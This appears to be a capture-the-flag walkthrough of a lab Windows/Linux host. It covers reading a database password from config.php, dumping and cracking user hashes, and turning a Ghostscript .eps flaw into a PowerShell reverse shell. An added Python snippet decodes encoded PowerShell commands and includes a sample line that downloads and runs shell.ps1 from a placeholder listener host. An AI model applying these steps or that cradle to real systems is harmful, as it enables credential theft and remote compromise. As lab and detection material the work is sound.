Enumeration

www-data@webserver:/var/www/html$ cat config.php
cat config.php
<?php
/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', 'my$qls3rv1c3!');
define('DB_NAME', 'hospital');
 
/* Attempt to connect to MySQL database */
$link = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);
 
// Check connection
if($link === false){
    die("ERROR: Could not connect. " . mysqli_connect_error());
}
?>
www-data@webserver:/var/www/html$ mysql -u root -p
mysql -u root -p
Enter password: my$qls3rv1c3!

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 25
Server version: 10.11.2-MariaDB-1 Ubuntu 23.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| hospital           |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0.012 sec)

MariaDB [(none)]> use hospital;
use hospital;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [hospital]> show tables;
show tables;
+--------------------+
| Tables_in_hospital |
+--------------------+
| users              |
+--------------------+
1 row in set (0.000 sec)

MariaDB [hospital]> select * from users;
select * from users;
+----+----------+--------------------------------------------------------------+---------------------+
| id | username | password                                                     | created_at          |
+----+----------+--------------------------------------------------------------+---------------------+
|  1 | admin    | $2y$10$caGIEbf9DBF7ddlByqCkrexkt0cPseJJ5FiVO1cnhG.3NLrxcjMh2 | 2023-09-21 14:46:04 |
|  2 | patient  | $2y$10$a.lNstD7JdiNYxEepKf1/OZ5EM5wngYrf.m5RxXCgSud7MVU6/tgO | 2023-09-21 15:35:11 |
|  3 | haxor    | $2y$10$u5esMP8Sx/D47oRX.lUMBuK/F5RHLCcE0AyniFidN39AF7Pyu9gty | 2025-02-11 11:47:08 |
+----+----------+--------------------------------------------------------------+---------------------+
3 rows in set (0.000 sec)

I was able to escalate to root using this exploit.

If we crack the drwilliams hash, we get the following credentials: drwilliams:qwe123!@#

This is our first pair of credentials, so I want to check them against the domain.

WinRM didn't work, but we can RDP!

RDP fails too.

Reading the email in Roundcube, we see that the user is asking for a .eps file. It turns out Ghostscript has a vulnerability: if we can provide a malicious .eps file, we can get a reverse shell. I went online and found this PoC.

Running it with the revshell option creates a .eps file, but it's made for Unix:

We need to modify it to run in PowerShell. I used this shell.ps1, which also shows how to trigger it. Basically, we can host the shell.ps1 file and change the payload above to make a request to our web server for this file.

It turns out a better way of doing it is to create a new payload with the --payload option.

First we need to create our string and convert it to little-endian (UTF-16LE) base64:

Once that is done, we can generate the payload to run it with -enc (EncodedCommand):

I have to start the web server and a listener. The user will open the file, and we will get a PowerShell shell.
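The UTF-16LE base64 form that -enc expects is also exactly what a defender sees in process-creation telemetry. As an added example (not code from the original post), this Python decodes such arguments from constructed sample log lines and flags common download-cradle indicators; the switch-prefix handling and the indicator list are my assumptions.

```python
"""Decode PowerShell -EncodedCommand (UTF-16LE + base64) arguments in process-creation
log lines and flag download-cradle indicators. Added triage example; samples are constructed."""
import base64
import shlex

# Substrings that commonly indicate a download-and-execute cradle (assumed list).
CRADLE_INDICATORS = ("downloadstring", "downloadfile", "net.webclient",
                     "invoke-expression", "iex", "invoke-webrequest", "frombase64string")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if cmdline carries -EncodedCommand, else None.
    PowerShell accepts any unambiguous prefix of the switch (-e, -ec, -enc ...),
    so any prefix of 'encodedcommand' that starts with 'e' is treated as it."""
    try:
        argv = shlex.split(cmdline, posix=False)
    except ValueError:
        argv = cmdline.split()
    for i, arg in enumerate(argv[:-1]):
        flag = arg.lstrip("-/").lower()
        if flag.startswith("e") and "encodedcommand".startswith(flag):
            try:
                return base64.b64decode(argv[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None  # switch present but the argument is not valid -enc data
    return None


def find_indicators(script: str):
    """List the cradle indicators present in a decoded script (case-insensitive)."""
    low = script.lower()
    return [ind for ind in CRADLE_INDICATORS if ind in low]


def triage(log_lines):
    """Return (decoded_script, indicators) for each line carrying an encoded command."""
    decoded = (decode_encoded_command(line) for line in log_lines)
    return [(s, find_indicators(s)) for s in decoded if s is not None]


def _enc(script: str) -> str:
    # Builds the constructed samples in the same UTF-16LE + base64 form the post uses.
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines (not real telemetry); the host name is a placeholder.
SAMPLE_LOGS = [
    "powershell.exe -nop -w hidden -enc " + _enc(
        "IEX (New-Object Net.WebClient).DownloadString('http://LISTENER-HOST/shell.ps1')"),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "powershell.exe -e " + _enc("Get-Date"),
]
```

Running `triage(SAMPLE_LOGS)` decodes the two encoded entries and leaves the plain `-File` invocation untouched, so the decoded script rather than the opaque base64 is what ends up in the alert.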

We also find the credentials for the user:

Our new pair of credentials is drbrown:chr!$br0wn. I can use these creds for WinRM!

Checked SMB shares. Nothing there.

We can also RDP with this user.
